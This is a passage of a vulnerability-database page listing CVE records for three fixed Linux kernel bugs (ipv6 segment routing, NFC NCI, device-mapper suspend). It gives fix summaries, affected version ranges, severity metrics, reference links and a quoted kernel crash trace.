"lessThan": "82831e3ff76ef09fb184eb93b79a3eb3fb284f1d",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "65c38f23d10ff79feea1e5d50b76dc7af383c1e6",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "91b020aaa1e59bfb669d34c968e3db3d5416bcee",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "8391b9b651cfdf80ab0f1dc4a489f9d67386e197",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "9e02973dbc6a91e40aa4f5d87b8c47446fbfce44",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "02b08db594e8218cfbc0e4680d4331b457968a9b",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
},
{
"lessThan": "5559cea2d5aa3018a5f00dd2aca3427ba09b386b",
"status": "affected",
"version": "915d7e5e5930b4f01d0971d93b9b25ed17d221aa",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv6/seg6.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.10"
},
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: sr: fix possible use-after-free and null-ptr-deref\n\nThe pernet operations structure for the subsystem must be registered\nbefore registering the generic netlink family."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:55:13.758Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/953f42934533c151f440cd32390044d2396b87aa"
},
{
"url": "https://git.kernel.org/stable/c/82831e3ff76ef09fb184eb93b79a3eb3fb284f1d"
},
{
"url": "https://git.kernel.org/stable/c/65c38f23d10ff79feea1e5d50b76dc7af383c1e6"
},
{
"url": "https://git.kernel.org/stable/c/91b020aaa1e59bfb669d34c968e3db3d5416bcee"
},
{
"url": "https://git.kernel.org/stable/c/8391b9b651cfdf80ab0f1dc4a489f9d67386e197"
},
{
"url": "https://git.kernel.org/stable/c/9e02973dbc6a91e40aa4f5d87b8c47446fbfce44"
},
{
"url": "https://git.kernel.org/stable/c/02b08db594e8218cfbc0e4680d4331b457968a9b"
},
{
"url": "https://git.kernel.org/stable/c/5559cea2d5aa3018a5f00dd2aca3427ba09b386b"
}
],
"title": "ipv6: sr: fix possible use-after-free and null-ptr-deref",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26735",
"datePublished": "2024-04-03T17:00:21.972Z",
"dateReserved": "2024-02-19T14:20:24.165Z",
"dateUpdated": "2025-05-04T08:55:13.758Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38381 (GCVE-0-2024-38381)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
nfc: nci: Fix uninit-value in nci_rx_work
syzbot reported the following uninit-value access issue [1]
nci_rx_work() parses received packet from ndev->rx_q. It should be
validated header size, payload size and total packet size before
processing the packet. If an invalid packet is detected, it should be
silently discarded.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 11387b2effbb55f58dc2111ef4b4b896f2756240 Version: 03fe259649a551d336a7f20919b641ea100e3fff Version: 755e53bbc61bc1aff90eafa64c8c2464fd3dfa3c Version: ac68d9fa09e410fa3ed20fb721d56aa558695e16 Version: b51ec7fc9f877ef869c01d3ea6f18f6a64e831a7 Version: a946ebee45b09294c8b0b0e77410b763c4d2817a Version: d24b03535e5eb82e025219c2f632b485409c898f Version: d24b03535e5eb82e025219c2f632b485409c898f Version: 8948e30de81faee87eeee01ef42a1f6008f5a83a |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:21.599Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/406cfac9debd4a6d3dc5d9258ee086372a8c08b6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/485ded868ed62ceb2acb3a459d7843fd71472619"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f80b786ab0550d0020191a59077b2c7e069db2d1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad4d196d2008c7f413167f0a693feb4f0439d7fe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e8c8e0d0d214c877fbad555df5b3ed558cd9b0c3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e53a7f8afcbd2886f2a94c5d56757328109730ea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/017ff397624930fd7ac7f1761f3c9d6a7100f68c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e4a87abf588536d1cdfb128595e6e680af5cf3ed"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38381",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:09:25.051432Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:45.388Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/nfc/nci/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "406cfac9debd4a6d3dc5d9258ee086372a8c08b6",
"status": "affected",
"version": "11387b2effbb55f58dc2111ef4b4b896f2756240",
"versionType": "git"
},
{
"lessThan": "485ded868ed62ceb2acb3a459d7843fd71472619",
"status": "affected",
"version": "03fe259649a551d336a7f20919b641ea100e3fff",
"versionType": "git"
},
{
"lessThan": "f80b786ab0550d0020191a59077b2c7e069db2d1",
"status": "affected",
"version": "755e53bbc61bc1aff90eafa64c8c2464fd3dfa3c",
"versionType": "git"
},
{
"lessThan": "ad4d196d2008c7f413167f0a693feb4f0439d7fe",
"status": "affected",
"version": "ac68d9fa09e410fa3ed20fb721d56aa558695e16",
"versionType": "git"
},
{
"lessThan": "e8c8e0d0d214c877fbad555df5b3ed558cd9b0c3",
"status": "affected",
"version": "b51ec7fc9f877ef869c01d3ea6f18f6a64e831a7",
"versionType": "git"
},
{
"lessThan": "e53a7f8afcbd2886f2a94c5d56757328109730ea",
"status": "affected",
"version": "a946ebee45b09294c8b0b0e77410b763c4d2817a",
"versionType": "git"
},
{
"lessThan": "017ff397624930fd7ac7f1761f3c9d6a7100f68c",
"status": "affected",
"version": "d24b03535e5eb82e025219c2f632b485409c898f",
"versionType": "git"
},
{
"lessThan": "e4a87abf588536d1cdfb128595e6e680af5cf3ed",
"status": "affected",
"version": "d24b03535e5eb82e025219c2f632b485409c898f",
"versionType": "git"
},
{
"status": "affected",
"version": "8948e30de81faee87eeee01ef42a1f6008f5a83a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/nfc/nci/core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.9"
},
{
"lessThan": "6.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "6.1.85",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "6.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "6.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.8.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfc: nci: Fix uninit-value in nci_rx_work\n\nsyzbot reported the following uninit-value access issue [1]\n\nnci_rx_work() parses received packet from ndev-\u003erx_q. It should be\nvalidated header size, payload size and total packet size before\nprocessing the packet. If an invalid packet is detected, it should be\nsilently discarded."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:39.584Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/406cfac9debd4a6d3dc5d9258ee086372a8c08b6"
},
{
"url": "https://git.kernel.org/stable/c/485ded868ed62ceb2acb3a459d7843fd71472619"
},
{
"url": "https://git.kernel.org/stable/c/f80b786ab0550d0020191a59077b2c7e069db2d1"
},
{
"url": "https://git.kernel.org/stable/c/ad4d196d2008c7f413167f0a693feb4f0439d7fe"
},
{
"url": "https://git.kernel.org/stable/c/e8c8e0d0d214c877fbad555df5b3ed558cd9b0c3"
},
{
"url": "https://git.kernel.org/stable/c/e53a7f8afcbd2886f2a94c5d56757328109730ea"
},
{
"url": "https://git.kernel.org/stable/c/017ff397624930fd7ac7f1761f3c9d6a7100f68c"
},
{
"url": "https://git.kernel.org/stable/c/e4a87abf588536d1cdfb128595e6e680af5cf3ed"
}
],
"title": "nfc: nci: Fix uninit-value in nci_rx_work",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38381",
"datePublished": "2024-06-21T10:18:12.302Z",
"dateReserved": "2024-06-21T10:12:11.547Z",
"dateUpdated": "2025-11-04T17:21:21.599Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26880 (GCVE-0-2024-26880)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
dm: call the resume method on internal suspend
There is this reported crash when experimenting with the lvm2 testsuite.
The list corruption is caused by the fact that the postsuspend and resume
methods were not paired correctly; there were two consecutive calls to the
origin_postsuspend function. The second call attempts to remove the
"hash_list" entry from a list, while it was already removed by the first
call.
Fix __dm_internal_resume so that it calls the preresume and resume
methods of the table's targets.
If a preresume method of some target fails, we are in a tricky situation.
We can't return an error because dm_internal_resume isn't supposed to
return errors. We can't return success, because then the "resume" and
"postsuspend" methods would not be paired correctly. So, we set the
DMF_SUSPENDED flag and we fake normal suspend - it may confuse userspace
tools, but it won't cause a kernel crash.
------------[ cut here ]------------
kernel BUG at lib/list_debug.c:56!
invalid opcode: 0000 [#1] PREEMPT SMP
CPU: 1 PID: 8343 Comm: dmsetup Not tainted 6.8.0-rc6 #4
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:__list_del_entry_valid_or_report+0x77/0xc0
<snip>
RSP: 0018:ffff8881b831bcc0 EFLAGS: 00010282
RAX: 000000000000004e RBX: ffff888143b6eb80 RCX: 0000000000000000
RDX: 0000000000000001 RSI: ffffffff819053d0 RDI: 00000000ffffffff
RBP: ffff8881b83a3400 R08: 00000000fffeffff R09: 0000000000000058
R10: 0000000000000000 R11: ffffffff81a24080 R12: 0000000000000001
R13: ffff88814538e000 R14: ffff888143bc6dc0 R15: ffffffffa02e4bb0
FS: 00000000f7c0f780(0000) GS:ffff8893f0a40000(0000) knlGS:0000000000000000
CS: 0010 DS: 002b ES: 002b CR0: 0000000080050033
CR2: 0000000057fb5000 CR3: 0000000143474000 CR4: 00000000000006b0
Call Trace:
<TASK>
? die+0x2d/0x80
? do_trap+0xeb/0xf0
? __list_del_entry_valid_or_report+0x77/0xc0
? do_error_trap+0x60/0x80
? __list_del_entry_valid_or_report+0x77/0xc0
? exc_invalid_op+0x49/0x60
? __list_del_entry_valid_or_report+0x77/0xc0
? asm_exc_invalid_op+0x16/0x20
? table_deps+0x1b0/0x1b0 [dm_mod]
? __list_del_entry_valid_or_report+0x77/0xc0
origin_postsuspend+0x1a/0x50 [dm_snapshot]
dm_table_postsuspend_targets+0x34/0x50 [dm_mod]
dm_suspend+0xd8/0xf0 [dm_mod]
dev_suspend+0x1f2/0x2f0 [dm_mod]
? table_deps+0x1b0/0x1b0 [dm_mod]
ctl_ioctl+0x300/0x5f0 [dm_mod]
dm_compat_ctl_ioctl+0x7/0x10 [dm_mod]
__x64_compat_sys_ioctl+0x104/0x170
do_syscall_64+0x184/0x1b0
entry_SYSCALL_64_after_hwframe+0x46/0x4e
RIP: 0033:0xf7e6aead
<snip>
---[ end trace 0000000000000000 ]---
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ffcc39364160663cda1a3c358f4537302a92459b Version: ffcc39364160663cda1a3c358f4537302a92459b Version: ffcc39364160663cda1a3c358f4537302a92459b Version: ffcc39364160663cda1a3c358f4537302a92459b Version: ffcc39364160663cda1a3c358f4537302a92459b Version: ffcc39364160663cda1a3c358f4537302a92459b Version: ffcc39364160663cda1a3c358f4537302a92459b Version: ffcc39364160663cda1a3c358f4537302a92459b Version: ffcc39364160663cda1a3c358f4537302a92459b |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26880",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-16T18:04:34.890631Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-01T17:18:07.417Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:04.209Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/69836d9329f0b4c58faaf3d886a7748ddb5bf718"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/da7ece2197101b1469853e6b5e915be1e3896d52"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f89bd27709376d37ff883067193320c58a8c1d5a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/03ad5ad53e51abf3a4c7538c1bc67a5982b41dc5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad10289f68f45649816cc68eb93f45fd5ec48a15"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/15a3fc5c8774c17589dabfe1d642d40685c985af"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ef02d8edf738557af2865c5bfb66a03c4e071be7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/360a7d1be8112654f1fb328ed3862be630bca3f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/65e8fbde64520001abf1c8d0e573561b4746ef38"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/md/dm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "69836d9329f0b4c58faaf3d886a7748ddb5bf718",
"status": "affected",
"version": "ffcc39364160663cda1a3c358f4537302a92459b",
"versionType": "git"
},
{
"lessThan": "da7ece2197101b1469853e6b5e915be1e3896d52",
"status": "affected",
"version": "ffcc39364160663cda1a3c358f4537302a92459b",
"versionType": "git"
},
{
"lessThan": "f89bd27709376d37ff883067193320c58a8c1d5a",
"status": "affected",
"version": "ffcc39364160663cda1a3c358f4537302a92459b",
"versionType": "git"
},
{
"lessThan": "03ad5ad53e51abf3a4c7538c1bc67a5982b41dc5",
"status": "affected",
"version": "ffcc39364160663cda1a3c358f4537302a92459b",
"versionType": "git"
},
{
"lessThan": "ad10289f68f45649816cc68eb93f45fd5ec48a15",
"status": "affected",
"version": "ffcc39364160663cda1a3c358f4537302a92459b",
"versionType": "git"
},
{
"lessThan": "15a3fc5c8774c17589dabfe1d642d40685c985af",
"status": "affected",
"version": "ffcc39364160663cda1a3c358f4537302a92459b",
"versionType": "git"
},
{
"lessThan": "ef02d8edf738557af2865c5bfb66a03c4e071be7",
"status": "affected",
"version": "ffcc39364160663cda1a3c358f4537302a92459b",
"versionType": "git"
},
{
"lessThan": "360a7d1be8112654f1fb328ed3862be630bca3f4",
"status": "affected",
"version": "ffcc39364160663cda1a3c358f4537302a92459b",
"versionType": "git"
},
{
"lessThan": "65e8fbde64520001abf1c8d0e573561b4746ef38",
"status": "affected",
"version": "ffcc39364160663cda1a3c358f4537302a92459b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/md/dm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.19"
},
{
"lessThan": "3.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "3.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: call the resume method on internal suspend\n\nThere is this reported crash when experimenting with the lvm2 testsuite.\nThe list corruption is caused by the fact that the postsuspend and resume\nmethods were not paired correctly; there were two consecutive calls to the\norigin_postsuspend function. The second call attempts to remove the\n\"hash_list\" entry from a list, while it was already removed by the first\ncall.\n\nFix __dm_internal_resume so that it calls the preresume and resume\nmethods of the table\u0027s targets.\n\nIf a preresume method of some target fails, we are in a tricky situation.\nWe can\u0027t return an error because dm_internal_resume isn\u0027t supposed to\nreturn errors. We can\u0027t return success, because then the \"resume\" and\n\"postsuspend\" methods would not be paired correctly. So, we set the\nDMF_SUSPENDED flag and we fake normal suspend - it may confuse userspace\ntools, but it won\u0027t cause a kernel crash.\n\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:56!\ninvalid opcode: 0000 [#1] PREEMPT SMP\nCPU: 1 PID: 8343 Comm: dmsetup Not tainted 6.8.0-rc6 #4\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x77/0xc0\n\u003csnip\u003e\nRSP: 0018:ffff8881b831bcc0 EFLAGS: 00010282\nRAX: 000000000000004e RBX: ffff888143b6eb80 RCX: 0000000000000000\nRDX: 0000000000000001 RSI: ffffffff819053d0 RDI: 00000000ffffffff\nRBP: ffff8881b83a3400 R08: 00000000fffeffff R09: 0000000000000058\nR10: 0000000000000000 R11: ffffffff81a24080 R12: 0000000000000001\nR13: ffff88814538e000 R14: ffff888143bc6dc0 R15: ffffffffa02e4bb0\nFS: 00000000f7c0f780(0000) GS:ffff8893f0a40000(0000) knlGS:0000000000000000\nCS: 0010 DS: 002b ES: 002b CR0: 0000000080050033\nCR2: 0000000057fb5000 CR3: 0000000143474000 CR4: 00000000000006b0\nCall Trace:\n \u003cTASK\u003e\n ? die+0x2d/0x80\n ? do_trap+0xeb/0xf0\n ? __list_del_entry_valid_or_report+0x77/0xc0\n ? do_error_trap+0x60/0x80\n ? __list_del_entry_valid_or_report+0x77/0xc0\n ? exc_invalid_op+0x49/0x60\n ? __list_del_entry_valid_or_report+0x77/0xc0\n ? asm_exc_invalid_op+0x16/0x20\n ? table_deps+0x1b0/0x1b0 [dm_mod]\n ? __list_del_entry_valid_or_report+0x77/0xc0\n origin_postsuspend+0x1a/0x50 [dm_snapshot]\n dm_table_postsuspend_targets+0x34/0x50 [dm_mod]\n dm_suspend+0xd8/0xf0 [dm_mod]\n dev_suspend+0x1f2/0x2f0 [dm_mod]\n ? table_deps+0x1b0/0x1b0 [dm_mod]\n ctl_ioctl+0x300/0x5f0 [dm_mod]\n dm_compat_ctl_ioctl+0x7/0x10 [dm_mod]\n __x64_compat_sys_ioctl+0x104/0x170\n do_syscall_64+0x184/0x1b0\n entry_SYSCALL_64_after_hwframe+0x46/0x4e\nRIP: 